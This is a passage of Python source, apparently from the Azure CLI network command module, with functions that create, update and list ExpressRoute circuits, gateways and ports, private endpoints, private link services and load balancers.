def update_express_route(instance, cmd, bandwidth_in_mbps=None, peering_location=None,
service_provider_name=None, sku_family=None, sku_tier=None, tags=None,
allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
with cmd.update_context(instance) as c:
c.set_param('allow_classic_operations', allow_classic_operations)
c.set_param('tags', tags)
c.set_param('allow_global_reach', allow_global_reach)
with cmd.update_context(instance.sku) as c:
c.set_param('family', sku_family)
c.set_param('tier', sku_tier)
with cmd.update_context(instance.service_provider_properties) as c:
c.set_param('peering_location', peering_location)
c.set_param('service_provider_name', service_provider_name)
if express_route_port is not None:
SubResource = cmd.get_models('SubResource')
instance.express_route_port = SubResource(id=express_route_port)
instance.service_provider_properties = None
if bandwidth_in_mbps is not None:
if not instance.express_route_port:
instance.service_provider_properties.bandwith_in_mbps = float(bandwidth_in_mbps)
else:
instance.bandwidth_in_gbps = (float(bandwidth_in_mbps) / 1000)
return instance
def create_express_route_peering_connection(cmd, resource_group_name, circuit_name, peering_name, connection_name,
peer_circuit, address_prefix, authorization_key=None):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
ExpressRouteCircuitConnection, SubResource = cmd.get_models('ExpressRouteCircuitConnection', 'SubResource')
source_circuit = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='expressRouteCircuits',
name=circuit_name,
child_type_1='peerings',
child_name_1=peering_name
)
conn = ExpressRouteCircuitConnection(
express_route_circuit_peering=SubResource(id=source_circuit),
peer_express_route_circuit_peering=SubResource(id=peer_circuit),
address_prefix=address_prefix,
authorization_key=authorization_key
)
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def set_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name, connection_name,
address_prefix):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
Ipv6CircuitConnectionConfig = cmd.get_models('Ipv6CircuitConnectionConfig')
ipv6_config = Ipv6CircuitConnectionConfig(
address_prefix=address_prefix
)
conn.ipv6_circuit_connection_config = ipv6_config
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def remove_express_route_peering_connection_config(cmd, resource_group_name, circuit_name, peering_name,
connection_name):
client = network_client_factory(cmd.cli_ctx).express_route_circuit_connections
# Get Conn
try:
conn = client.get(resource_group_name, circuit_name, peering_name, connection_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Peering Connection {} doesn't exist".format(connection_name))
conn.ipv6_circuit_connection_config = None
return client.begin_create_or_update(resource_group_name, circuit_name, peering_name, connection_name, conn)
def _validate_ipv6_address_prefixes(prefixes):
from ipaddress import ip_network, IPv6Network
prefixes = prefixes if isinstance(prefixes, list) else [prefixes]
version = None
for prefix in prefixes:
try:
network = ip_network(prefix)
if version is None:
version = type(network)
else:
if not isinstance(network, version): # pylint: disable=isinstance-second-argument-not-valid-type
raise CLIError("usage error: '{}' incompatible mix of IPv4 and IPv6 address prefixes."
.format(prefixes))
except ValueError:
raise CLIError("usage error: prefix '{}' is not recognized as an IPv4 or IPv6 address prefix."
.format(prefix))
return version == IPv6Network
def create_express_route_peering(
cmd, client, resource_group_name, circuit_name, peering_type, peer_asn, vlan_id,
primary_peer_address_prefix, secondary_peer_address_prefix, shared_key=None,
advertised_public_prefixes=None, customer_asn=None, routing_registry_name=None,
route_filter=None, legacy_mode=None, ip_version='IPv4'):
(ExpressRouteCircuitPeering, ExpressRouteCircuitPeeringConfig, RouteFilter) = \
cmd.get_models('ExpressRouteCircuitPeering', 'ExpressRouteCircuitPeeringConfig', 'RouteFilter')
if cmd.supported_api_version(min_api='2018-02-01'):
ExpressRoutePeeringType = cmd.get_models('ExpressRoutePeeringType')
else:
ExpressRoutePeeringType = cmd.get_models('ExpressRouteCircuitPeeringType')
if ip_version == 'IPv6' and cmd.supported_api_version(min_api='2020-08-01'):
Ipv6ExpressRouteCircuitPeeringConfig = cmd.get_models('Ipv6ExpressRouteCircuitPeeringConfig')
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
microsoft_config = ExpressRouteCircuitPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
else:
microsoft_config = None
ipv6 = Ipv6ExpressRouteCircuitPeeringConfig(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
peering = ExpressRouteCircuitPeering(peering_type=peering_type, ipv6_peering_config=ipv6, peer_asn=peer_asn,
vlan_id=vlan_id)
else:
peering = ExpressRouteCircuitPeering(
peering_type=peering_type, peer_asn=peer_asn, vlan_id=vlan_id,
primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
shared_key=shared_key)
if peering_type == ExpressRoutePeeringType.microsoft_peering.value:
peering.microsoft_peering_config = ExpressRouteCircuitPeeringConfig(
advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
if cmd.supported_api_version(min_api='2016-12-01') and route_filter:
peering.route_filter = RouteFilter(id=route_filter)
if cmd.supported_api_version(min_api='2017-10-01') and legacy_mode is not None:
peering.microsoft_peering_config.legacy_mode = legacy_mode
return client.begin_create_or_update(resource_group_name, circuit_name, peering_type, peering)
def _create_or_update_ipv6_peering(cmd, config, primary_peer_address_prefix, secondary_peer_address_prefix,
route_filter, advertised_public_prefixes, customer_asn, routing_registry_name):
if config:
# update scenario
with cmd.update_context(config) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
if route_filter:
RouteFilter = cmd.get_models('RouteFilter')
config.route_filter = RouteFilter(id=route_filter)
else:
# create scenario
IPv6Config, MicrosoftPeeringConfig = cmd.get_models(
'Ipv6ExpressRouteCircuitPeeringConfig', 'ExpressRouteCircuitPeeringConfig')
microsoft_config = MicrosoftPeeringConfig(advertised_public_prefixes=advertised_public_prefixes,
customer_asn=customer_asn,
routing_registry_name=routing_registry_name)
config = IPv6Config(primary_peer_address_prefix=primary_peer_address_prefix,
secondary_peer_address_prefix=secondary_peer_address_prefix,
microsoft_peering_config=microsoft_config,
route_filter=route_filter)
return config
def update_express_route_peering(cmd, instance, peer_asn=None, primary_peer_address_prefix=None,
secondary_peer_address_prefix=None, vlan_id=None, shared_key=None,
advertised_public_prefixes=None, customer_asn=None,
routing_registry_name=None, route_filter=None, ip_version='IPv4',
legacy_mode=None):
# update settings common to all peering types
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('vlan_id', vlan_id)
c.set_param('shared_key', shared_key)
if ip_version == 'IPv6':
# update is the only way to add IPv6 peering options
instance.ipv6_peering_config = _create_or_update_ipv6_peering(cmd, instance.ipv6_peering_config,
primary_peer_address_prefix,
secondary_peer_address_prefix, route_filter,
advertised_public_prefixes, customer_asn,
routing_registry_name)
else:
# IPv4 Microsoft Peering (or non-Microsoft Peering)
with cmd.update_context(instance) as c:
c.set_param('primary_peer_address_prefix', primary_peer_address_prefix)
c.set_param('secondary_peer_address_prefix', secondary_peer_address_prefix)
if route_filter is not None:
RouteFilter = cmd.get_models('RouteFilter')
instance.route_filter = RouteFilter(id=route_filter)
try:
with cmd.update_context(instance.microsoft_peering_config) as c:
c.set_param('advertised_public_prefixes', advertised_public_prefixes)
c.set_param('customer_asn', customer_asn)
c.set_param('routing_registry_name', routing_registry_name)
c.set_param('legacy_mode', legacy_mode)
except AttributeError:
raise CLIError('--advertised-public-prefixes, --customer-asn, --routing-registry-name and '
'--legacy-mode are only applicable for Microsoft Peering.')
return instance
# endregion
# region ExpressRoute Connection
# pylint: disable=unused-argument
def create_express_route_connection(cmd, resource_group_name, express_route_gateway_name, connection_name,
peering, circuit_name=None, authorization_key=None, routing_weight=None,
enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
ExpressRouteConnection, SubResource, RoutingConfiguration, PropagatedRouteTable\
= cmd.get_models('ExpressRouteConnection', 'SubResource', 'RoutingConfiguration', 'PropagatedRouteTable')
client = network_client_factory(cmd.cli_ctx).express_route_connections
propagated_route_tables = PropagatedRouteTable(
labels=labels,
ids=[SubResource(id=propagated_route_table) for propagated_route_table in
propagated_route_tables] if propagated_route_tables else None
)
routing_configuration = RoutingConfiguration(
associated_route_table=SubResource(id=associated_route_table),
propagated_route_tables=propagated_route_tables
)
connection = ExpressRouteConnection(
name=connection_name,
express_route_circuit_peering=SubResource(id=peering) if peering else None,
authorization_key=authorization_key,
routing_weight=routing_weight,
routing_configuration=routing_configuration
)
if enable_internet_security and cmd.supported_api_version(min_api='2019-09-01'):
connection.enable_internet_security = enable_internet_security
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, connection_name, connection)
# pylint: disable=unused-argument
def update_express_route_connection(instance, cmd, circuit_name=None, peering=None, authorization_key=None,
routing_weight=None, enable_internet_security=None, associated_route_table=None,
propagated_route_tables=None, labels=None):
SubResource = cmd.get_models('SubResource')
if peering is not None:
instance.express_route_connection_id = SubResource(id=peering)
if authorization_key is not None:
instance.authorization_key = authorization_key
if routing_weight is not None:
instance.routing_weight = routing_weight
if enable_internet_security is not None and cmd.supported_api_version(min_api='2019-09-01'):
instance.enable_internet_security = enable_internet_security
if associated_route_table is not None or propagated_route_tables is not None or labels is not None:
if instance.routing_configuration is None:
RoutingConfiguration = cmd.get_models('RoutingConfiguration')
instance.routing_configuration = RoutingConfiguration()
if associated_route_table is not None:
instance.routing_configuration.associated_route_table = SubResource(id=associated_route_table)
if propagated_route_tables is not None or labels is not None:
if instance.routing_configuration.propagated_route_tables is None:
PropagatedRouteTable = cmd.get_models('PropagatedRouteTable')
instance.routing_configuration.propagated_route_tables = PropagatedRouteTable()
if propagated_route_tables is not None:
instance.routing_configuration.propagated_route_tables.ids = [SubResource(id=propagated_route_table) for propagated_route_table in propagated_route_tables] # pylint: disable=line-too-long
if labels is not None:
instance.routing_configuration.propagated_route_tables.labels = labels
return instance
# endregion
# region ExpressRoute Gateways
def create_express_route_gateway(cmd, resource_group_name, express_route_gateway_name, location=None, tags=None,
min_val=2, max_val=None, virtual_hub=None):
ExpressRouteGateway, SubResource = cmd.get_models('ExpressRouteGateway', 'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_gateways
gateway = ExpressRouteGateway(
location=location,
tags=tags,
virtual_hub=SubResource(id=virtual_hub) if virtual_hub else None
)
if min or max:
gateway.auto_scale_configuration = {'bounds': {'min': min_val, 'max': max_val}}
return client.begin_create_or_update(resource_group_name, express_route_gateway_name, gateway)
def update_express_route_gateway(instance, cmd, tags=None, min_val=None, max_val=None):
def _ensure_autoscale():
if not instance.auto_scale_configuration:
ExpressRouteGatewayPropertiesAutoScaleConfiguration, \
ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds = cmd.get_models(
'ExpressRouteGatewayPropertiesAutoScaleConfiguration',
'ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds')
instance.auto_scale_configuration = ExpressRouteGatewayPropertiesAutoScaleConfiguration(
bounds=ExpressRouteGatewayPropertiesAutoScaleConfigurationBounds(min=min, max=max))
if tags is not None:
instance.tags = tags
if min is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.min = min_val
if max is not None:
_ensure_autoscale()
instance.auto_scale_configuration.bounds.max = max_val
return instance
def list_express_route_gateways(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_gateways
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
# endregion
# region ExpressRoute ports
def create_express_route_port(cmd, resource_group_name, express_route_port_name, location=None, tags=None,
peering_location=None, bandwidth_in_gbps=None, encapsulation=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ExpressRoutePort = cmd.get_models('ExpressRoutePort')
if bandwidth_in_gbps is not None:
bandwidth_in_gbps = int(bandwidth_in_gbps)
port = ExpressRoutePort(
location=location,
tags=tags,
peering_location=peering_location,
bandwidth_in_gbps=bandwidth_in_gbps,
encapsulation=encapsulation
)
return client.begin_create_or_update(resource_group_name, express_route_port_name, port)
def update_express_route_port(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags, True)
return instance
def download_generated_loa_as_pdf(cmd,
resource_group_name,
express_route_port_name,
customer_name,
file_path='loa.pdf'):
import os
import base64
dirname, basename = os.path.dirname(file_path), os.path.basename(file_path)
if basename == '':
basename = 'loa.pdf'
elif basename.endswith('.pdf') is False:
basename = basename + '.pdf'
file_path = os.path.join(dirname, basename)
generate_express_route_ports_loa_request =\
cmd.get_models('GenerateExpressRoutePortsLOARequest')(customer_name=customer_name)
client = network_client_factory(cmd.cli_ctx).express_route_ports
response = client.generate_loa(resource_group_name, express_route_port_name,
generate_express_route_ports_loa_request)
encoded_content = base64.b64decode(response.encoded_content)
from azure.cli.core.azclierror import FileOperationError
try:
with open(file_path, 'wb') as f:
f.write(encoded_content)
except OSError as ex:
raise FileOperationError(ex)
logger.warning("The generated letter of authorization is saved at %s", file_path)
def list_express_route_ports(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).express_route_ports
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def assign_express_route_port_identity(cmd, resource_group_name, express_route_port_name,
user_assigned_identity, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
ManagedServiceIdentity, ManagedServiceIdentityUserAssignedIdentitiesValue = \
cmd.get_models('ManagedServiceIdentity', 'Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties') # pylint: disable=line-too-long
user_assigned_identity_instance = ManagedServiceIdentityUserAssignedIdentitiesValue()
user_assigned_identities_instance = dict()
user_assigned_identities_instance[user_assigned_identity] = user_assigned_identity_instance
identity_instance = ManagedServiceIdentity(type="UserAssigned",
user_assigned_identities=user_assigned_identities_instance)
ports.identity = identity_instance
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def remove_express_route_port_identity(cmd, resource_group_name, express_route_port_name, no_wait=False):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
if ports.identity is None:
logger.warning("The identity of the ExpressRoute Port doesn't exist.")
return ports
ports.identity = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, express_route_port_name, ports)
def show_express_route_port_identity(cmd, resource_group_name, express_route_port_name):
client = network_client_factory(cmd.cli_ctx).express_route_ports
ports = client.get(resource_group_name, express_route_port_name)
return ports.identity
def update_express_route_port_link(cmd, instance, parent, express_route_port_name, link_name,
macsec_cak_secret_identifier=None, macsec_ckn_secret_identifier=None,
macsec_sci_state=None, macsec_cipher=None, admin_state=None):
"""
:param cmd:
:param instance: an instance of ExpressRoutePort
:param express_route_port_name:
:param link_name:
:param macsec_cak_secret_identifier:
:param macsec_ckn_secret_identifier:
:param macsec_cipher:
:param admin_state:
:return:
"""
if any([macsec_cak_secret_identifier, macsec_ckn_secret_identifier, macsec_cipher, macsec_sci_state]):
instance.mac_sec_config.cak_secret_identifier = macsec_cak_secret_identifier
instance.mac_sec_config.ckn_secret_identifier = macsec_ckn_secret_identifier
# TODO https://github.com/Azure/azure-rest-api-specs/issues/7569
# need to remove this conversion when the issue is fixed.
if macsec_cipher is not None:
macsec_ciphers_tmp = {'gcm-aes-128': 'GcmAes128', 'gcm-aes-256': 'GcmAes256'}
macsec_cipher = macsec_ciphers_tmp.get(macsec_cipher, macsec_cipher)
instance.mac_sec_config.cipher = macsec_cipher
instance.mac_sec_config.sci_state = macsec_sci_state
if admin_state is not None:
instance.admin_state = admin_state
return parent
# endregion
# region PrivateEndpoint
def create_private_endpoint(cmd, resource_group_name, private_endpoint_name, subnet,
private_connection_resource_id, connection_name, group_ids=None,
virtual_network_name=None, tags=None, location=None,
request_message=None, manual_request=None, edge_zone=None, custom_interface_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
PrivateEndpoint, Subnet, PrivateLinkServiceConnection = cmd.get_models('PrivateEndpoint',
'Subnet',
'PrivateLinkServiceConnection')
pls_connection = PrivateLinkServiceConnection(private_link_service_id=private_connection_resource_id,
group_ids=group_ids,
request_message=request_message,
name=connection_name)
private_endpoint = PrivateEndpoint(
location=location,
tags=tags,
subnet=Subnet(id=subnet)
)
if manual_request:
private_endpoint.manual_private_link_service_connections = [pls_connection]
else:
private_endpoint.private_link_service_connections = [pls_connection]
if edge_zone:
private_endpoint.extended_location = _edge_zone_model(cmd, edge_zone)
if cmd.supported_api_version(min_api='2021-05-01') and custom_interface_name:
private_endpoint.custom_network_interface_name = custom_interface_name
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def update_private_endpoint(instance, cmd, tags=None, request_message=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
if request_message is not None:
if instance.private_link_service_connections:
instance.private_link_service_connections[0].request_message = request_message
else:
instance.manual_private_link_service_connections[0].request_message = request_message
return instance
def list_private_endpoints(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def create_private_endpoint_private_dns_zone_group(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneGroup, PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneGroup', 'PrivateDnsZoneConfig')
private_dns_zone_group = PrivateDnsZoneGroup(name=private_dns_zone_group_name,
private_dns_zone_configs=[PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, # pylint: disable=line-too-long
name=private_dns_zone_name)]) # pylint: disable=line-too-long
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name, private_dns_zone):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
PrivateDnsZoneConfig = cmd.get_models('PrivateDnsZoneConfig')
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone = PrivateDnsZoneConfig(private_dns_zone_id=private_dns_zone, name=private_dns_zone_name)
private_dns_zone_group.private_dns_zone_configs.append(private_dns_zone)
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def remove_private_endpoint_private_dns_zone(cmd, resource_group_name, private_endpoint_name,
private_dns_zone_group_name,
private_dns_zone_name):
client = network_client_factory(cmd.cli_ctx).private_dns_zone_groups
private_dns_zone_group = client.get(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name)
private_dns_zone_configs = [item for item in private_dns_zone_group.private_dns_zone_configs if item.name != private_dns_zone_name] # pylint: disable=line-too-long
private_dns_zone_group.private_dns_zone_configs = private_dns_zone_configs
return client.begin_create_or_update(resource_group_name=resource_group_name,
private_endpoint_name=private_endpoint_name,
private_dns_zone_group_name=private_dns_zone_group_name,
parameters=private_dns_zone_group)
def add_private_endpoint_ip_config(cmd, resource_group_name, private_endpoint_name,
ip_config_name=None, group_id=None, member_name=None, private_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
PrivateEndpointIPConfiguration = cmd.get_models("PrivateEndpointIPConfiguration")
ip_config = PrivateEndpointIPConfiguration(
name=ip_config_name,
group_id=group_id,
member_name=member_name,
private_ip_address=private_ip_address
)
private_endpoint.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def remove_private_endpoint_ip_config(cmd, resource_group_name, private_endpoint_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
ip_config = None
for item in private_endpoint.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None:
logger.warning("IP Configuration %s doesn't exist.", ip_config_name)
return private_endpoint
private_endpoint.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def list_private_endpoint_ip_config(cmd, resource_group_name, private_endpoint_name):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
return private_endpoint.ip_configurations
def add_private_endpoint_asg(cmd, resource_group_name, private_endpoint_name, application_security_group_id=None):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
ApplicationSecurityGroup = cmd.get_models("ApplicationSecurityGroup")
asg = ApplicationSecurityGroup(id=application_security_group_id)
try:
private_endpoint.application_security_groups.append(asg)
except AttributeError:
private_endpoint.application_security_groups = [asg]
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def remove_private_endpoint_asg(cmd, resource_group_name, private_endpoint_name, application_security_group_id):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
asg = None
for item in private_endpoint.application_security_groups:
if item.id == application_security_group_id:
asg = item
break
if asg is None:
logger.warning("Application security group %s doesn't exist.", application_security_group_id)
return private_endpoint
private_endpoint.application_security_groups.remove(asg)
return client.begin_create_or_update(resource_group_name, private_endpoint_name, private_endpoint)
def list_private_endpoint_asg(cmd, resource_group_name, private_endpoint_name):
client = network_client_factory(cmd.cli_ctx).private_endpoints
private_endpoint = client.get(resource_group_name, private_endpoint_name)
return private_endpoint.application_security_groups
# endregion
# region PrivateLinkService
def create_private_link_service(cmd, resource_group_name, service_name, subnet, frontend_ip_configurations,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
virtual_network_name=None, public_ip_address=None,
location=None, tags=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None,
enable_proxy_protocol=None, edge_zone=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
FrontendIPConfiguration, PrivateLinkService, PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = \
cmd.get_models('FrontendIPConfiguration', 'PrivateLinkService', 'PrivateLinkServiceIpConfiguration',
'PublicIPAddress', 'Subnet')
pls_ip_config = PrivateLinkServiceIpConfiguration(
name='{}_ipconfig_0'.format(service_name),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service = PrivateLinkService(
location=location,
load_balancer_frontend_ip_configurations=frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
],
ip_configurations=[pls_ip_config],
visbility=visibility,
auto_approval=auto_approval,
fqdns=fqdns,
tags=tags,
enable_proxy_protocol=enable_proxy_protocol
)
if edge_zone:
link_service.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def update_private_link_service(instance, cmd, tags=None, frontend_ip_configurations=None, load_balancer_name=None,
visibility=None, auto_approval=None, fqdns=None, enable_proxy_protocol=None):
FrontendIPConfiguration = cmd.get_models('FrontendIPConfiguration')
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('load_balancer_frontend_ip_configurations', frontend_ip_configurations and [
FrontendIPConfiguration(id=ip_config) for ip_config in frontend_ip_configurations
])
c.set_param('visibility', visibility)
c.set_param('auto_approval', auto_approval)
c.set_param('fqdns', fqdns)
c.set_param('enable_proxy_protocol', enable_proxy_protocol)
return instance
def list_private_link_services(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
if resource_group_name:
return client.list(resource_group_name)
return client.list_by_subscription()
def update_private_endpoint_connection(cmd, resource_group_name, service_name, pe_connection_name,
connection_status, description=None, action_required=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateEndpointConnection, PrivateLinkServiceConnectionState = cmd.get_models('PrivateEndpointConnection',
'PrivateLinkServiceConnectionState')
connection_state = PrivateLinkServiceConnectionState(
status=connection_status,
description=description,
actions_required=action_required
)
pe_connection = PrivateEndpointConnection(
private_link_service_connection_state=connection_state
)
return client.update_private_endpoint_connection(resource_group_name, service_name, pe_connection_name, pe_connection) # pylint: disable=line-too-long
def add_private_link_services_ipconfig(cmd, resource_group_name, service_name,
private_ip_address=None, private_ip_allocation_method=None,
private_ip_address_version=None,
subnet=None, virtual_network_name=None, public_ip_address=None):
client = network_client_factory(cmd.cli_ctx).private_link_services
PrivateLinkServiceIpConfiguration, PublicIPAddress, Subnet = cmd.get_models('PrivateLinkServiceIpConfiguration',
'PublicIPAddress',
'Subnet')
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_name_index = len(link_service.ip_configurations)
ip_config = PrivateLinkServiceIpConfiguration(
name='{0}_ipconfig_{1}'.format(service_name, ip_name_index),
private_ip_address=private_ip_address,
private_ip_allocation_method=private_ip_allocation_method,
private_ip_address_version=private_ip_address_version,
subnet=subnet and Subnet(id=subnet),
public_ip_address=public_ip_address and PublicIPAddress(id=public_ip_address)
)
link_service.ip_configurations.append(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
def remove_private_link_services_ipconfig(cmd, resource_group_name, service_name, ip_config_name):
client = network_client_factory(cmd.cli_ctx).private_link_services
link_service = client.get(resource_group_name, service_name)
if link_service is None:
raise CLIError("Private link service should be existed. Please create it first.")
ip_config = None
for item in link_service.ip_configurations:
if item.name == ip_config_name:
ip_config = item
break
if ip_config is None: # pylint: disable=no-else-return
logger.warning("%s ip configuration doesn't exist", ip_config_name)
return link_service
else:
link_service.ip_configurations.remove(ip_config)
return client.begin_create_or_update(resource_group_name, service_name, link_service)
# endregion
def _edge_zone_model(cmd, edge_zone):
ExtendedLocation, ExtendedLocationTypes = cmd.get_models('ExtendedLocation', 'ExtendedLocationTypes')
return ExtendedLocation(name=edge_zone, type=ExtendedLocationTypes.EDGE_ZONE)
# region LoadBalancers
def create_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
private_ip_address=None, public_ip_address=None,
public_ip_address_allocation=None,
public_ip_dns_name=None, subnet=None, subnet_address_prefix='10.0.0.0/24',
virtual_network_name=None, vnet_address_prefix='10.0.0.0/16',
public_ip_address_type=None, subnet_type=None, validate=False,
no_wait=False, sku=None, frontend_ip_zone=None, public_ip_zone=None,
private_ip_address_version=None, edge_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource, build_vnet_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
subnet_id = subnet if is_valid_resource_id(subnet) else None
private_ip_allocation = IPAllocationMethod.static.value if private_ip_address \
else IPAllocationMethod.dynamic.value
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if edge_zone and cmd.supported_api_version(min_api='2020-08-01'):
edge_zone_type = 'EdgeZone'
else:
edge_zone_type = None
if subnet_type == 'new':
lb_dependencies.append('Microsoft.Network/virtualNetworks/{}'.format(virtual_network_name))
vnet = build_vnet_resource(
cmd, virtual_network_name, location, tags, vnet_address_prefix, subnet,
subnet_address_prefix)
master_template.add_resource(vnet)
subnet_id = '{}/virtualNetworks/{}/subnets/{}'.format(
network_id_template, virtual_network_name, subnet)
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, None, edge_zone, edge_zone_type))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, subnet_id, private_ip_address, private_ip_allocation, sku,
frontend_ip_zone, private_ip_address_version, None, edge_zone, edge_zone_type)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
